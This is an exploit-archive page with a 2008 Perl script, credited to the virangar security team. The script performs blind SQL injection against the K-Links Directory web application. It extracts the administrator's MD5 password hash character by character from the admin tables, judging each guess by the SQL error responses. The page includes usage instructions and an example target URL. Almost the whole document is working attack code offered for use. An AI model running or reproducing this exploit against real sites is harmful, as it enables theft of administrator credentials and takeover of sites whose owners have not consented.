K-Links Directory Blind SQL Injection Exploit

2008-08-11 / 2008-08-12
Credit: hadihadi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/perl ########################################################################### # K-Links Directory Blind SQL Injection Exploit # # ..::virangar security team::.. # # www.virangar.net # # C0d3d BY:virangar security team ( hadihadi ) # #special tnx to: # #MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra # #& all virangar members & all hackerz # # my lovely friends hadi_aryaie2004 & arash(imm02tal) # # ..:::Young Iranina Hackerz::.. # ########################################################################### use HTTP::Request; use LWP::UserAgent; if (&#64;ARGV != 2){ header(); } $host = $ARGV[0]; $mod=$ARGV[1]; if($mod==1){ $tbl="tbl_admin"; $col="upass"; } elsif($mod==2){ $tbl="platinum_admins"; $col="a_apss"; } else{ print "\nyour option not true\n"; exit; } print "\n md5 Password:\r\n"; &halghe(); print "\n[+]Done\n"; sub halghe { for($i = 1; $i <= 32; $i++){ $f = 0; $n = 48; while(!$f && $n <= 57) { if(&inject($host ,$tbl ,$col ,$i, $n,)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; } if(!$f){ $n=97; while(!$f && $n <= 102) { if(&inject($host ,$tbl ,$col ,$i, $n,)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; }} } } sub inject { my $site = $_[0]; my $tl = $_[1]; my $cl = $_[2]; my $a = $_[3]; my $b = $_[4]; $attack= "$site"."%20and%20substring((select%20"."$cl"."%20from%20$tl%20limit%200,1),"."$a".",1)=char("."$b".")/*"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $req = $b->request(HTTP::Request->new(GET=>$attack)); $res = $req->content; if ($res !~ m/You have an error in your SQL syntax;/i and $res !~ m/Table.*doesn't exist/i ){ return 1; } } sub header { print qq{ ################################################################### # K-Links Directory Blind SQL Injection Exploit # # www.virangar.net # # Useage: perl $0 Host option # # option: 1 [table=tbl_admin & column=upass] # # 2 [table=platinum_admins & column=a_pass] # # # # Host: full patch to Report Link+id (dont forget http://) # # # # Example: # # perl $0 http://site.com/report/1 2 # # # ################################################################### }; }

References:

http://seclists.org/bugtraq/2008/Aug/0115.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top